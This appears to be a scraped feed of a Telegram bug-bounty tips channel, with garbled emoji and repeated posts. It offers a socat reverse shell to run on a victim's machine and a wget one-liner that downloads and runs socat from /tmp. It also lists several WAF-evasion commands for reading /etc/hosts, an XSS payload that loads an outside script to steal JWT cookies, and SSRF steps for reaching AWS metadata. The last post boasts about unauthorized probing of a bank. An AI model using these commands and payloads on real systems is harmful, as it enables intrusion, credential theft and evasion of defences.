API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
π₯22β€13
β‘Convert your basic nc reverse shell to a pro interactive shellπ
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
Use this command to use clear command:
Get a sexy shell prompt:
Use those alias for speed up:
To close the shell temporally:
Press control+Z
Use this command to back again session:
Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'Use this command to use clear command:
export TERM=xterm-256colorGet a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] 'Use those alias for speed up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'To close the shell temporally:
Press control+Z
Use this command to back again session:
stty raw -echo; fgGuys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯10πΏ8π5
β‘Bypass Series for bug huntersπ
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hostscat /proc/self/fd/0 < /etc/hostscat /etc/hosts | base64 | base64 -dcat /etc/hosts | string collectcat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π8β€5π₯3
β‘Bash Series for bug huntersπ
Part-2
Stop using directly nc and try with the following command:
Or
Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
If socat is not installed on the victim machine, use this one-liner to download a static binary:
to stop socat:
Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Stop using directly nc and try with the following command:
rlwrap -cAr nc -lvnp <port>Or
rlwrap -f . -r nc -lnvp <port>Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>to stop socat:
ps aux | grep socatKill -9 socat <PID>Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€2π1
β‘HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata β disclosed and rewarded $25,000! π€―
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π₯28β€10πΏ9π5π«‘2
This is really cool π₯
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
π13π₯2
β‘Bypass Series for bug huntersπ
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | revod -An -c /etc/hosts | tr -d ' 'cat $HOME/../../etc/hostscat ${PWD}/../../../etc/hostsgrep "" /etc/hostscut -c1- /etc/hostspaste /etc/hostsGuys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€7π5
β‘Bash Series for bug huntersπ
Part-2
Create multiple folders using one-liner:
This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
File creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
This sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Create multiple folders using one-liner:
mkdir {dev,test,prod}This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
touch {file1,file2,file3}.txtFile creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
seq -w 1 10 | xargs -I {} touch file{}.txtThis sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π4
program-list.json
1.1 MB
πHelpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.β‘
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
Don't forget to react π₯
π Follow me ππΌ DarkShadow
#BugBountytips
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
π Follow me ππΌ
#BugBountytips
π₯22π3π€2
β‘Popular HackerOne target Agoda.com was vulnerable to Stored XSS β Rewarded $3,200π¬
πCore Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
πAffected Functionality:
Property listing creation, including:
ββ’ Property Name
ββ’ Property Description
ββ’ Company Name
ββ’ Company Address
π₯Injection Payload:
π₯Impact:
On page load, the stored XSS steals the userβs JWT token from cookies, enabling full account takeover with zero user interaction.
π Follow meππΌ DarkShadow
#BugBountytips
πCore Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
πAffected Functionality:
Property listing creation, including:
ββ’ Property Name
ββ’ Property Description
ββ’ Company Name
ββ’ Company Address
π₯Injection Payload:
"><script src=https://hackbx.bxss.in></script>
This single payload can be used to execute thousands of XSS scripts.
π₯Impact:
On page load, the stored XSS steals the userβs JWT token from cookies, enabling full account takeover with zero user interaction.
π Follow meππΌ DarkShadow
#BugBountytips
πΏ12β€4π₯4π1π¨βπ»1
What do you think about these kinds of proof-of-concepts and bug bounty tips?
Drop your thoughts in the comments β Iβd love to hear your feedback and what you'd like to see next!πβ€οΈ
Drop your thoughts in the comments β Iβd love to hear your feedback and what you'd like to see next!πβ€οΈ
β€24π11
We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they donβt even mention or credit us after copying our content.
π25β€13π’4
Brut Security pinned Β«We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they donβt even mention or credit us after copying our content.Β»
β‘Bypass Series for bug huntersπ
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
guys, these are some custom payloads I personally crafted β highly effective at bypassing firewalls and evading detection.
For more follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tar cf - /etc/hosts | tar xf - -O gzip -c /etc/hosts | gzip -dless /e*c/h*st*more /e{t,c}*/{o,h}*s*{s,t}strings /??c/??stssort /etc/hosts | uniq guys, these are some custom payloads I personally crafted β highly effective at bypassing firewalls and evading detection.
For more follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π€3π2π¨βπ»2
Only 6 hours... and boom!
Found multiple critical vulnerabilities in US Bank β including:
Why you guys not following me yet?
It's like walking into a digital vault with no lock... just saying.
Ethically hacking to protect, not to exploit.
Does anyone know if they have a bug bounty or responsible disclosure program?
Found multiple critical vulnerabilities in US Bank β including:
Leaked sensitive information
Hardcoded auth credentials
Unprotected sensitive endpoints
Unauthenticated access to the dashboard
And more juicy stuff...
ο»Ώ
Why you guys not following me yet?
It's like walking into a digital vault with no lock... just saying.
Ethically hacking to protect, not to exploit.
Does anyone know if they have a bug bounty or responsible disclosure program?
π±23π11β€2